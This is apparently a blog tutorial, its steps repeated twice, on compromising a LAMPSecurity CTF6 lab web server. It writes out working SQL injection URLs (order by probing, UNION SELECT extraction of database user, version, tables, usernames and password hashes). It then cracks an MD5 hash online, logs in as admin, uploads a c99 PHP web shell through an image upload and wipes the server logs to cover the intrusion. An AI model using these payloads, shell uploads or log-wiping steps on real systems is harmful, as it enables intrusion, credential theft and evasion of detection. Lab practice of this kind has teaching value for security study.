Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: mantrahackbar1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tGeE_3dd4fxsM93hbmHgL5g6qcGmrtn7VnQfi4QOGU3YAUaLKcj9PuRDi2TzfxD3K03EoRqRS4FN7SNn63D977z3S3oZyhRPW6tiFFS_UVwIRjC4IbTsram10jHczzbwP3R2RhsGZVDworv2gBGiH64HW7NqARPDXJun_AdELDyX1D=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: mantrahackbar2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uMtGG7u2s_z1vi3ZbSiOC86x8qXZ4bNMhlE2989eHel0ijYk4mtOkzfz2NPfqw2wcszNK5tkQ_ZnVUkcBrgVWBdPKgiuBzbzVgoq6lieh0srOOQmlR_X6rfuyTvic0F5NthmutsCiwouEgyuM36EwwpY-3lmOLPQ_VVl3M6opRX8hscg=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: mantrahackbar3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sMStn6kevn0tT-bUEmjwiACyPJUXTUnTP12HHAfqQqvk5RrKzPjz6GP2CMaUvpBtdls5_D2dXd2N2lgWeBqKrTx9eYptkXMh5rmtX9zGyU6dYfxpJL4RQnml-kHOWxRv2A1f6zQgbPML1DyjATU58d919xDehLx2aa0T7H5jfKwI3Qvw=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: mantrahackbar4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_utVk8Ht_q6E4V4btRY3w5hAdqEeowXF9YU0xMZH76s9GJo-W7MqAuDHQ4h89s3lDfRvQSLwgfDCEUuLTCHb1VSjOoKy8TRcfrG8hjGzqLw1FIizfnsLOx_oTjByIi6iWlNlLtpuOBPzrQWTEj0MavezNxpi4snTDKU91hGZk-iEunLBA=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: mantrahackbar6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vxqZnVPzCi14PUyA7gvJFJhb-xzFwWVolSBAhlSi73NRHmJBDTUwQMo9ZutIWwt1tKLLqvnXz2oIJkfAm_7jxl4IdzCrOIPq86m7ta5dQ8uCdH2GV-SlHvETSnlVCmKNDN3iQG8EYQjPrpxov4OeysK7O7RU9tZDUEigTjzxLqu_wdbw=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: mantrahackbar7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uvMvY2lcYc_v43GbuthcCOku690yjby56IdFxMyAelGIbXoJ1uN3A3PWeQF7pr2AnfdBcgROMHunM5L0ecrr57kpOnluEzMl5T-pN4rZw9vOR_Bz223qfZIluVluQN4bX5zeN_PatWl4FFFis8gxvgFgwKqQGEK-mU5gb7eIKqnmcG=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: mantrahackbar12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tVTp_5Jd6Se6zfrr75xJaowXbx8IX01sg1ew6zlqpQ3PwkBWzxnGnXjfAV357ifE1kLbK-NBjaKs9qoNhE5MfME19qhEj5u-OL8pnh_0RboC8sgphEey2sLqwNcTY08CiN7i6zd5brwj7Wg3gcKe78MxWWo5U1DYVpxuaPJqBb8W07j58=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: mantrahackbar13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ur55mtKyxxoG3Anzq9xzPZZpYHSqq53VimkhFE1dPPOUWBLViOa6xRhiFSVjgT0CxlpbE15TwBfdvwVVRbDJEoADkoJIF4rSLKGKgfr-710Th6XQNYDPqEihWZ0qLCdyWrudLyAdh0v6pyQrXhQQ4XxksiGoRb5jNzULGiZczgcaLKB5g=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: mantrahackbar14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqjXJHStc0eufVSV0vb58Jq-RIpuWzr4lZ4_XObwUaFirYijfGmG4kg-xSIdkfNwMTWsNh7pZkhauUQC0A4Taua3ZYzOeCdA2L0WnFfGfyvlPUh56GlcqWZxwb1GcAOnj8tZ1_l7CoveEGIs1JHFvXViKDKUIqwK-vppRdpGBPA9D4JD4=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: mantrahackbar16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tAeMcHBCaMbZCUtGyvDuVoKrgqt9hsipqZFkx0yDGkuzm9l4Nj_RUO3LesYhC7zGqMxpODJ8tsNzTkYurdsizf1mFxF3JewkDWZPQQrRluieaLNaPFxEKWerILANqH6cHOdcJ88EVLLeSIaEmstH1Nv303Qj9K77xLurWi-tbe-Aqhivc=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: mantrahackbar19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vnnOoSg8kluSMhI_BLLTa08wtxmwPY8OhBpQAYiBVMttP2HFEouQojE_b6sRn2qc7KTlFCutaPfsdi4abSmxVsKTttOz2L7BcYJCowl5Nzd4F3NJmun6Dzq9B2qJ4jXlkwjx2pCqoZlv_eWqQ9uA_v8jWP5iOoJgQ8_ILAnyWXj5yllQ=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: mantrahackbar21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s0IO-oYrA2eoiLowYQpjcmzPcptkXpAmDRkDaYdELp-eWCMbjgvflj_9_NguJmp3Bfn0knxmk2EywKzNU8vpBCCvWGS2FBUAxWCrmC6pLwVdnrlhVsYe93e4ZnwziNto6ZdIUrCDnpILx-n-ps3iHzDlCKnFxLSZyZvqU7Knr0KRYNpOY=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: mantrahackbar22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_voxvWTdEsgTG7WXZA-QjsJKe_bvkGUvptEvswveCZ8jip6rEVvWeTwTimLEjbxEQ8t1kz43FUzgmyfcsdbY6YnI1C2dcclv59ZOIHmmmI7HkM76eW6XrrY3IKcqZ2hWuyjSKew0t0RCX1ylXJIfR8AIjzyCupXsYtgdJJeiik35RlvH4w=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: mantrahackbar23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_swFOHE5Z9x8m4x4LEwPsGylV5bJx0YMe003I7nviSHuI4Zks91H-nxsHi0Va1GwYKdYfyddCjND9DjN1L6U88djZ5OHlxYX6SToEvin3dUnNwV7K4Jj_LJOcPNsdDVkkKTng3XJbZTVy4xKENV5PJj1IUIjx4n_i7tutugIqvByhQQ-A=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: mantrahackbar24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tSn_XlD4Oh4lfBE38Ke5dMcR-fVs8suFf7TU27CdZa4KET35jl9tS--7iu5ASiCT269Qvczx8xVlwBFFn5XMW_XOgd3C5jsyYopUDvUCv2U8HpMaAcggv-SKXE2ZxJ2kDIBPPzKq3bimYOSuPFpAc0GiXQUc_mZ7Je1MpqrDxXOhYCmg=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: mantrahackbar25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s6LDl9ltup3a9oK8kCv8VHvBtxyN1SGH1d4uqkNON3bX5LDZ6axo9DKNIyTQlhtPPGgBRo_lxh1VylfcMoucBH-acq2whOWTUNEtG75pBUmkLdZ2700i_Ao11NRlFjUIa2fVUoMoiVs9_hGz4UHPocW3-eu5fBaNa0UFIs558Om_YXgw0=s0-d)
Step 17:
Lets find the user name
![[Image: mantrahackbar27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXr1lrokP-8KuGHZeTY3jtQh5w5MIrIXUnh5MzobAda5Don0KXzVP8nAD8j-ESZj3dGMwHMVuM_sEvvrPpvgMW4oPHDo8nWTH1FPYCzpfvcbr3lC3C6PKogsT-kFEbkNofd6emA3fApbxqT6o2orRTu7SRcnyDVppFOajicnXJNp8kIkg=s0-d)
Step 18:
Now, what about password
![[Image: mantrahackbar26.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tSWN1oZYBVo46f7iCXgDdBvZx5GNlPmNr_MOMNrdaR6XjepAhsTFQOirpMl1fpzx-CWu7fAfDCpEtP60dbf6PEAIpvs6RZsSFtv57nukgvboJsPuMmFbSjCKSV895owXmlNOaYjmSWSQmu4ia21yWG4ZLMfSY2JsxTS2baw-kGV6hz9Fo=s0-d)
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
![[Image: mantrahackbar30.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sW_IWZ6j00DmJD6WnK3Klj12F5Oevl4B3-jqU5W7sWNH7biFig06pwfaFjnm1PkeFH5NpNvQvoGNayOU3mbD9HVMB1eiVupdL8G38aOWDlEAmaH1le34ajfWx9V8PDDs3KgmzBUIo5gWT4py4mnBNLRvon4GwRIvawXkQ998_BUCqoYs8=s0-d)
Step 20:
Voila.!!! I got the password
![[Image: mantrahackbar31.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sasJPDhoHdNWbwkO7FCxJJFrzwX7lKI1_Z7V-920zdZUfm3r56TFb8Zf0wlXNna2eYiV1GKqf-xMPjJY2vxxFLRhAI5LKC9AQvDaxYnjR1sguIhIBxy19vk7Uvuel2-QN6XeIQLcd4mwwlhhGm1Z_Jt6q2exZtM4Q_CmnnE7GYYFwNJOQ=s0-d)
Step 21:
Finding the log in page. Its was right in front of me
![[Image: mantrahackbar32.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sO7gEPHHdo9OhlfzeTa7aDNFT2874gNZzaDV-8x77MUnSNJQeDRu7eWgUXljAJ8FE2GR3Er8k3UTgImxO98hxKdDJ5dql92KpoCI64k0wCnn8YxsZDl7AhBrBRrl7otRrWme3ksutov0-pwNQrauOe2LO1dpQgmQtT1Xy4W3-HctMmK9A=s0-d)
Step 22:
Logging in with the credentials I have
![[Image: mantrahackbar33.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vtVPprwbS9jCvsHVBgJE3FLalyjBKb8KJl4_P7pS6_LZMuJsC6akcyF57fvQr9SGpGSRhSGG1iAdUX9609HnRPvyxu6rJKZQBSbnB7q6m5H8RHS8-sWSu7yXrlezgs-cLDxTsScg1tWj3MLjcbZAiV6xOpD1iI-bkL4NdJOXpqvcuyevE=s0-d)
Step 23:
Greetings.!!!
![[Image: mantrahackbar35.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sfEvfwzA2mosNsEI_CSROMisVeH6BRs-TJPwK0pG9gT2PhvN1lyVsCOiW0YVZInEEEWA1oRZLTL9Quz5PbVEQatq14tNC9XpJleP8YkM0dNdF1Kg01Yv86zEvKjKnYOldsz9zQbku4_EByIPNXb9Nk_i_tZkgA7uTbj4bhFHZpaJYWFaw=s0-d)
Step 24:
I'm an admin now. Look at my powers.
![[Image: mantrahackbar36.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vx-yd1Mxzl47jUGn4gaem7LFTiUXhyd0BXd-XZyUkvWL4IVhyRi6C3Bg71CY7kxSmAovTRQhHpTNg72mPtXVg5B2h6XoNUvbhjr87LulGyGwKTAuAC9mqTfZyMk24ki8WmPuDMpoBIMqFHzY7mQkJmgqxaC8b28Thyzmgpvh7IfVFMHec=s0-d)
Step 25:
Let me add an event
![[Image: mantrahackbar37.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tZnxWr0D57lnrckwruetEoo6SLK8w1SX95I_4aBTTOAvPpy3T6WVQsoRL3BIrNPXqIrjQfVHWVTiEwc0txFspW2g3uDZHkuMw2c-L1nOkACw_qHq3BaFNW2KSOBB8Qb3zj_ykX7SVjaWcT0YL30-qUb4fazcpBB0fiS2xE2h5gLj5mBQ=s0-d)
Step 26:
and of course I want to upload a picture
![[Image: mantrahackbar38.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s9SaaNb9e39WhtXIehtChE1V_XOgiXWVt3Jb0YUs80U8Z1K8USqEI2euD6A-z357dMAELFvZnFUQ8MUN4D3xaEv75xzdnnXJQpOnfHgjXlwiGORfC4psCWdQ6CUUAFzjkGlLOeYJJVFa8rMKcCcq-wiIo9Qq1wRxeqykvAkT8erOTq8w=s0-d)
Step 27:
Lets see it allows me to upload the shell or not
![[Image: mantrahackbar39.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vIQbVTn83sW8xVMdXvF2jQraEKcFMpJY8Rz96QwXT01hTZeHynYHGcV9nPtj6Xc0zucA_e3P_JwR5-SG_zBXqjKivNQW5texqEr0PP3zaXNnijVhC0kEenc8wBQuT_gR6r27QUdG5udxOLd5SW2uOK1jl4Fgk1qiuTZq1N4rqH5sjmgoQ=s0-d)
Step 28:
Now I'm pressing on "Add Event" button
![[Image: mantrahackbar40.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_thwjrzVjikbrua812Jp_dN0Cv60phxW-ZbEtytOsd_iWEUTJxWwy-QY4EzGlYW8czwb9NVBRk5I90P85Owf403WLfsJI7i5D53KifvTApvdnOMkArUwTFwjGGckaqzAlfcu6VCyxD6_cIehF3je2ooNOo6xWNSsxDEFpwTHZ4HnMd6Hc4=s0-d)
Step 29:
Nice. Looks like it's got uploaded
![[Image: mantrahackbar41.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vVoM8TAGap0d9z8KqeTSYTrWMYbqhh8aWNbSR6rdeqw0Tgx6wz6IFCW29-afESnzO3sum7F2MsA42wdw2ocDBL1kw-ODM2hWitqWygK5f8OeVVjfrnhIM7id650p5wHXhmDNDPBsfOJVCoxROdkScCfPiYCPd-HPJ7wA3VBsxCWryUyw=s0-d)
Step 30:
Let's see where the shell got uploaded to
![[Image: mantrahackbar42.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vJWU-mCuM6l4wRtMUkxwDhjr_bBV_BV9iqbKT2EPT2l7IjYjZMF1HeDnXls48UpnZsNkGKFlX0s5_ImzOmizzOapiw6slRTv_OlN1dXZ7DLL5IPdP9Asg8NwDxPCndrwBs_1N6_h6tXmbaKva7LRdxKovR6dCOC55BbupoOeDcJUCgp10=s0-d)
Step 31:
I'm trying to get the default upload location
![[Image: mantrahackbar43.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t6DjZnFebTBmBKChGVs5WZCa-Cg0ItpslUxAeTtADRIYGNv7BGZy0DxEvJu7bbsWNEdWPq37OqhfeD7uAK5aMiWb1H9ouKhQEe0w7FyOpYA9mzom5U1wLyJHB4n8T8NaKmDB_JYvgoNlGZJBihUaLv6QL_yHUOmd4u9GWihytODuHayZs=s0-d)
![[Image: mantrahackbar44.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tzNmPrBidvut6MjAnR_sWhtqiD20J1lc9hfiBj0txW5v2Av7uJ_8qWEYTfgYlGXISsvLzKKMZ9sjtuW1Tsg4TuXP0ABs2Gu2qH9ZAx4TuqBNL4F594n1HjETgA7dkA34SVdFlGOzklUKePsLBs0jVlHpp8cIPX6gdd7Rk6MOumbL9Lfmk=s0-d)
Step 32:
Looks like I got it
![[Image: mantrahackbar45.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_twQSNdPCAzLnd2bIZj13VLWIgho3B8AlEqpBk52crXakKBM6CWlCxzuflAQLAEqKDTtcaQ2R0Cethj9QalW9_XtXacIZ9A1isqWvz8aTIhNg0rqm4EbKQjOCQYVpYHfkWD_ko1mgBNmCAvqdZENZjUyA6UUD5Jx93XrCgLLTZdhc7nAW0=s0-d)
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
![[Image: mantrahackbar46.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tmtrwncGDYRO_emrGkCn19_0c4e8_surtblsqWxJ3TbS82SBTuPgF-Y8n-8xStEez_HJ1nEYeOk6oCkJ2QOXVBZZIhw0vFzBWB8mNGfKKXk9XYYfhMixZLsat26mO2xgEJ-brFW1mpXzTt9FPOYpx6g9jhdMTFHKQqJH1FktiN3swDa60=s0-d)
Step 34:
I simply clicked on the up button to get the root folder
![[Image: mantrahackbar48.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vcooo-zTlyEQTLj4PlQbqH_RA7t5YjJndPNDSifqvPoSFhBIxyNPMN0khbux0QG0A59mGjhXVtp8ILcmv3DNheDyyF5QqRHePSc8hGaK7zhyk6IaQ7RU4-juqvRT8SUKf9-_gwsR5HkdENWyT3YComUDoXYKotnbMJKV5wjkAkGMlmnjE=s0-d)
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
![[Image: mantrahackbar49.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t89LFQXQXFIU1iFA84TG8eEg9PmvgDD2xYenzh9BgQtz92pq3tBLrgWZHb06YL4qrlG9zypwFYETNyShXBD-cnuIAu1JLtFaRwuEw9bPrurdN-d9dexCKWsXMQEE9r3bCvrwF3h132jbk0BzWhkYSmVqls0aNDvbWUQ_oUOLZSYbw5w58=s0-d)
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
![[Image: mantrahackbar51.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u8y8sbPjBYRMpQc3DwahZUSJcGKCLX3XqREJWpp71Xu9GdRZmBlhCCq_Vgg81P-1jTG9KSNXqOCEUPz3-m4tLjJoQ5r7cStWf9ZwJtDtQd3uNIe6oTvKRksZ48OpKGVf8xBYIEo7RjJNBPchSwJYDRLpI-j4FSTJKMc9kEnigh_dvDpw=s0-d)
Step 37:
Let me go back and edit the log file
![[Image: mantrahackbar52.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vznKKmtO8AYmAJqYrj2oKbCxZES5KXFRb39BzB7fDKa8A6Isv_ZznyQTry0FkJyrk0cild_Vaw7uak6lWCDSmSWcK9Heyold8JIEyrSjoI5dJmPWLtnFbKGfpp2F45ZlxBChD-gR5FBXmkVNxv6Or4U7U_5IIus-aDirxyCr9L2tbVXW4=s0-d)
![[Image: mantrahackbar53.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uwoB3-rHE7SkWB6ayQoa_9RN4MvOmCHZpfoqrlkmCeejJI9wKXb9IGTwIXv9Qlr4JfHnQ9qvvN-ZGRiBe3px4YKVbOR4cMTlpFFZCV3_mZR6MuPJikvsTDO3rOwjE3ByrkAjf7zbfe3qSOKGuaq0Yl3_GBtHst9EJcqTVKcs6OUd7HSg=s0-d)
Step 38:
I deleted complete log entries. Now saving it.
![[Image: mantrahackbar54.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t6LhTDAU_QzIlmz65JgAbF71uRzItGJjSG7Kn08pqxzkA6Ki_-A2o86jlHEiIIA1_MDWqbrb3KwjyGpxU1KxsG_Psf_RCVN7i9pUNMS0T7q51JrVaQzRkG_lJ6We6BKmPTwMSuxIe5LhFL9ngeBhiB3p9zKpFMo5ur4oscKYdk3E-MhJA=s0-d)
Step 39:
Nice. Log file is empty now
![[Image: mantrahackbar56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sXM9Qc3CKHpFgJaVWncD5YD9kRck12erHd3ZsoXKi6dssSyEstVianVOJqhnMcTJTiaxQqGQ25Cmsyv4sk8IHfbJrHWU18IWrmML2phESN_3iYeOCVZhbetKXKVue78IOIiovWSntJSxp8JMtPYM_0pu_Jlbkv8LaZNLTShyUKQpZilg4=s0-d)
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
![[Image: mantrahackbar57.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vg-oRlZfFg5JQNDN818xaz_JLzBXJ3FEeyX9S_YRN8rwOqZ3pNbTQRpsaPyH1ypClk0FFy3rZFgrOhKdrduhkqSmyLEYdZHAcaFFYltKmW4VuZW4T-Q5rpPvwyE490MQSEQY4d4mzNM2wb7t_rW0qrQZfnzgoDiH88DXWhA-uUAyQ31aY=s0-d)
Step 41:
Confirmed.!!!
![[Image: mantrahackbar58.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqkeys1-pG12KuUJhx-wU4jG2pI2Rn5OCzI-p6asYWe8h5w2XWkrUjwqkGby5yO_ZQXOzYmXZE81-NEgfKYhDQT1dmJh6d49ZLjIePJmv5VEbcxF_g5S_9z1tfbwJMJSIq7v9KmEpToYXiJYB9G9RaYmgf6nTaY1XSJJCDZXIh9qASAmw=s0-d)
Step 42:
OK. Good Bye C99
![[Image: mantrahackbar59.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uzVOlw8FqFtXtVFlohPjcWuUb0sTeMnRXN45LTj5bEAey3W2Im3EUamEMUOQWEKXWltrzLcyzsiluUMV2uon6EvmyC6YUai1rHCjWrgAl5ykfEy5iB9pr7l0_y1D5UxbbUyWN3Dv1YjDmoXfYMg7C9Lq8WPuqDHEcUTpEH-2Y99BrKBQ=s0-d)
Step 43:
Well. It got deleted itself
![[Image: mantrahackbar60.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tjapIS-eE2VxSBXvPqd1lUoOYT4AhMvbOzS7H8wMhuKNm7tWDEGSFl9--yPWPU6pMawLrDa9zY5YDGWJt6L9jpIGKdzct1sYinvYplt7tG6yP1AlsUvnYtK4n57NzkQRH_pndpHC5u8j5KDJbjBKkU21AU2ysSyxs-Psf3pxOC4-Kr-_c=s0-d)
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
H4qqy H4ck!ng
Tags
bypassing